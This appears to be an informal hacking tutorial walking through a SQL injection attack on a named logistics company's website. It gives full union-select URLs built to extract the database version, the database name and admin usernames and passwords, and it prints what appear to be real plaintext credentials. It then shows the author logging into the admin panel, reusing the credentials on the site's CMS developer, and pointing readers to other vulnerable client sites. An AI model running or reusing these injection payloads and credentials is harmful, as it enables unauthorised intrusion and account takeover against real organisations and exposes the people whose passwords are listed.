../password_reuse_multi-pwn_like_an_old_school_hacker

/bit/and/cheese

~/today i'll walk u through an epitome of password reuse - and how we pwn several sites with simple vulns_ anatomy of this tutorial is simple:_

= using only w3m + wget - because im old school & fucking cool

= union injection

= exploit password reuse

$ first we got a target

wget -S --spider "http://whitearrowlogistics.com/storage.asp?id=19\'"

HTTP request sent, awaiting response...

HTTP/1.1 500 Internal Server Error <<< status code is true

Date: [n/a]

Server: Microsoft-IIS/6.0

X-Powered-By: PleskWin

X-Powered-By: ASP.NET

$ now we use w3m to confirm

w3m -dump "http://whitearrowlogistics.com/storage.asp?id=19\'"|grep 'error'|less

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 3.51 Driver]

$ vulnerable - mysql - so we need to find the version_ most mysql version has 'community' in it - so we gonna grep this (since the output was cluttered - we're gonna mark the out put with square brackets = 0x5b 0x5d)

w3m -dump 'http://whitearrowlogistics.com/storage.asp?id=-19%20and%201=2%20union%20all%20select%20null,null,null,null,null,null,concat%280x5b,@@version,0x5b,0x2e%29,null,null--'|grep community|less

$ next we seek for current db

w3m -dump 'http://whitearrowlogistics.com/storage.asp?id=-19%20and%201=2%20union%20all%20select%20null,null,null,null,null,null,concat%280x2e,0x5b,database(),0x5d,0x2e%29,null,null--'|grep 'db'|less

$ now we dump the username and password

w3m -dump http://whitearrowlogistics.com/storage.asp?id=-19%20and%201=2%20union%20all%20select%20null,null,null,null,null,null,%28select%20concat%280x7174696a71,ifnull%28cast%28password%20as%20char%29,0x3c62722f3e20%29,0x66727378756d,ifnull%28cast%28username%20as%20char%29,0x3c62722f3e20%29,0x716c627571%29%20from%20whitearrowdb.admin_users%20limit%202,1%29,null,null--|less

$ voila!_

user pass

nigel neubiberg1

ken na691500a

mark whitearrow682424

$ these blokes used strong pass - too bad they were in plain text!_ time to search for login page

wget -S --spider http://www.whitearrowlogistics.com/login/

wget -S --spider http://www.whitearrowlogistics.com/admin/

$ got lucky on 2nd try_ let's login..._ with w3m (love the jap for this)

w3m http://www.whitearrowlogistics.com/admin/

$ magic!_ now we notice a line at bottom of the admin page said >> Please contact sales@e-cc.org 'blah blah' << it mean we have found the CMS dev_ let's see if we can pwn it too - find admin page

wget -S --spider http://www.whitearrowlogistics.com/admin/

$ same page as the last target - let's try to login with the user/pass we have

w3m http://www.whitearrowlogistics.com/admin/

$ w00t!_ same pass & usr!

$$

$ let's recon the site with Bing search using site:

w3m -dump 'http://www.bing.com/search?q=site:e-cc.org+asp?id=&go=&filt=all&first=1'|less

$ first search result said >> www.e-cc.org/webdesigners.asp?id=6 << let's check if this vuln too

wget -S --spider www.e-cc.org/webdesigners.asp?id=6

$$ it gave a 500_ responded said ADODB.Command error '800a0d5d' - in fact - almost all of their clients' website have some kind of database errors_ i'll leave this here for you guys to pickup_